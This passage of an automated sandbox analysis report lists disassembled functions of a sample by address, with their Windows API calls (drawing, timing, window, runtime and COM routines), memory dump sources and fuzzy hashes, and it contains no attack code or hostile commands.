                                                                        • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                        • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                        • BeginPath.GDI32(?), ref: 0044723D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Select$BeginCreateDeletePath
                                                                        • String ID:
                                                                        • API String ID: 2338827641-0
                                                                        • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                        • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                        • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                        • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                        Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 00434598
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                        • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CounterPerformanceQuerySleep
                                                                        • String ID:
                                                                        • API String ID: 2875609808-0
                                                                        • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                        • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                        • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                        • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                        Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                        • MessageBeep.USER32(00000000), ref: 00460C46
                                                                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                        • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                        • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                        • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                        • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                        Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                                                        • String ID:
                                                                        • API String ID: 4023252218-0
                                                                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                        Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                        • String ID:
                                                                        • API String ID: 1489400265-0
                                                                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                        Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                        • DestroyWindow.USER32(?), ref: 00455728
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 1042038666-0
                                                                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                        Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 0041780F
                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                        • __getptd.LIBCMT ref: 00417826
                                                                        • __amsg_exit.LIBCMT ref: 00417834
                                                                        • __lock.LIBCMT ref: 00417844
                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                        • String ID:
                                                                        • API String ID: 938513278-0
                                                                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                        Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                        • String ID:
                                                                        • API String ID: 2403457894-0
                                                                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                        Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                        • String ID:
                                                                        • API String ID: 4247068974-0
                                                                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                        Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$U$\
                                                                        • API String ID: 0-3705770531
                                                                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                        Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                        • String ID: .lnk
                                                                        • API String ID: 886957087-24824748
                                                                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                        Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                        • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                        • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                        • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                        Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                        • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                        • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                        • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                        Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                        • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                        • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                        • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
